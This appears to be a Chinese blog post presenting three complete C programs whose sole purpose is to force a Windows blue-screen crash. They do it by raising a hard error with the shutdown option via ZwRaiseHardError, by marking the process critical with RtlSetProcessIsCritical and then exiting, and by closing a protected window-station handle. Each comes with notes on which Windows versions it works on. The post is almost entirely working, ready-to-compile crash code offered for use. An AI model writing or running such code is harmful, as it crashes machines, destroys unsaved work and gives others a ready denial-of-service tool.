c语言蓝屏代码
1.win10,XP可用
#include <Windows.h>
#include <STDBOOL.h>
BOOL SetPrivilege(LPCSTR lpPrivilegeName, WINBOOL fEnable)
{
HANDLE hToken;
TOKEN_PRIVILEGES NewState;
LUID luidPrivilegeLUID;
if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
{
/*If opening token failed...*/
return FALSE;
}
if(fEnable == FALSE) /*We disable all the privileges... */
{
if(!AdjustTokenPrivileges(hToken, TRUE, NULL, NULL, NULL, NULL))
{
return FALSE;
}
else return TRUE;
}
/*Look up the LUID value of the privilege... */
LookupPrivilegeValue(NULL, lpPrivilegeName, &luidPrivilegeLUID);
NewState.PrivilegeCount = 1;
NewState.Privileges[0].Luid = luidPrivilegeLUID;
NewState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
/*Improve this process's privilege, so we can shut down the system next. */
if(!AdjustTokenPrivileges(hToken, FALSE, &NewState, NULL, NULL, NULL))
{
return FALSE;
}
/*We should not only check if the improving was successed... */
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
{
return FALSE;
}
return TRUE;
}
typedef enum _HARDERROR_RESPONSE_OPTION {
OptionAbortRetryIgnore,
OptionOk,
OptionOkCancel,
OptionRetryCancel,
OptionYesNo,
OptionYesNoCancel,
OptionShutdownSystem,
OptionOkNoWait,
OptionCancelTryContinue
} HARDERROR_RESPONSE_OPTION;
typedef LONG (WINAPI *type_ZwRaiseHardError)(LONG ErrorStatus, ULONG NumberOfParameters, ULONG UnicodeStringParameterMask, PULONG_PTR Parameters, HARDERROR_RESPONSE_OPTION ValidResponseOptions, PULONG Response);
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWCH Buffer;
} UNICODE_STRING;
int main(int argc, char* argv[])
{
FreeConsole();
UNICODE_STRING str = {8, 10, L"test"};
ULONG x, args[] = {0x12345678, 0x87654321, (ULONG)&str};
HMODULE hDll = GetModuleHandle(TEXT("ntdll.dll"));
type_ZwRaiseHardError ZwRaiseHardError = (type_ZwRaiseHardError)GetProcAddress(hDll, "ZwRaiseHardError");
bool bSuccess = SetPrivilege(SE_SHUTDOWN_NAME, TRUE);
if(bSuccess) ZwRaiseHardError(0xC000021A, 3, 4, args, OptionShutdownSystem, &x);
SetPrivilege(NULL, FALSE);
return 0;
}
2.XP可用,win7win10需要 UAC 管理员许可
#include <windows.h>
#include <STDBOOL.h>
int main() {
typedef NTSTATUS(WINAPI *RtlSetProcessIsCritical) (BOOLEAN, PBOOLEAN, BOOLEAN);
typedef BOOL(WINAPI *RtlAdjustPrivilege) (ULONG, BOOL, BOOL, PBOOLEAN);
RtlAdjustPrivilege AdjustPrivilege;
RtlSetProcessIsCritical SetCriticalProcess;
// 加载 ntdll 以及相关 API
HANDLE ntdll = LoadLibrary(TEXT("ntdll.dll"));
AdjustPrivilege = (RtlAdjustPrivilege)GetProcAddress((HINSTANCE)ntdll, "RtlAdjustPrivilege");
SetCriticalProcess = (RtlSetProcessIsCritical)GetProcAddress((HINSTANCE)ntdll, "RtlSetProcessIsCritical");
BOOLEAN b;
// 进程提升至 Debug 权限,需要 UAC 管理员许可
AdjustPrivilege(20UL, TRUE, FALSE, &b);
// 设置为 Critical Process
SetCriticalProcess(TRUE, NULL, FALSE);
// 退出,触发 CRITICAL_PROCESS_DIED 蓝屏
return 0;
}
3.XP win7可用,win10不可用
#include <windows.h>
int main(){
HWINSTA hWinSta;
hWinSta = CreateWindowStation("abc123", NULL, 55, NULL);
SetHandleInformation(hWinSta, HANDLE_FLAG_PROTECT_FROM_CLOSE, HANDLE_FLAG_PROTECT_FROM_CLOSE);
CloseWindowStation(hWinSta);
return 0;
}
update:
date 2020.3.25 删除4.
本文来自博客园,作者:Ruptpsych,转载请注明原文链接:https://www.cnblogs.com/obj-a/articles/C-LANGUAGE-BSOD.html
